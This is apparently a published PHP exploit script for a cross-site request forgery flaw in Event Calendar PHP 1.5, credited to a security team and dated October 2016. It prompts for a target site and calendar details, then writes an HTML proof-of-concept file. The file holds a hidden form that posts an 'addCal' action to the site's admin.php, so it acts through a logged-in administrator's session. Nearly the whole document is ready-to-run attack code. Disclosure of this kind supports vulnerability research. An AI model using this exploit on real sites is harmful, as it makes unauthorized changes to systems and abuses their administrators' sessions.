<?php #===================================================== # Event Calendar PHP 1.5 - Cross-Site Request Forgery #===================================================== # Vendor Homepage: http://eventcalendarphp.com/ # Date: 21 Oct 2016 # Demo Link : http://eventcalendarphp.com/eventcalendar/admin.php # Version : 1.5 # Platform : WebApp - PHP # Author: Ashiyane Digital Security Team # Contact: hehsan979@gmail.com #===================================================== print " ####################################################################### # Event Calendar PHP 1.5 CSRF # # Discovered By Ehsan Hosseini # # Ashiyane Digital Security Team # # We Love Leader # #######################################################################\n\n"; print 'Enter Site Url (localhost): '; $site = htmlspecialchars(trim(fgets(STDIN,256))); print 'Enter Calender Name: '; $cal_name = htmlspecialchars(trim(fgets(STDIN,256))); print 'Enter Description Name: '; $description = htmlspecialchars(trim(fgets(STDIN,256))); $poc = "<html> <!-- CSRF PoC --> <body> <form action='http://$site/admin.php' method='post' name='form' enctype='multipart/form-data'> <input type='hidden' name='act' value='addCal'> <input type='hidden' name='cal_name' value='$cal_name'> <input type='hidden' name='description' value='$description'> <input name='submit' type='submit' value='Create Calendar'> </form> </body> </html>"; print 'Enter Exploit name (csrfpoc)'; $pocname = trim(fgets(STDIN,256)); $exploit = fopen("$pocname.html", "w"); fwrite($exploit, $poc); fclose($exploit); #===================================================== # Discovered By : Ehsan Hosseini #===================================================== ?>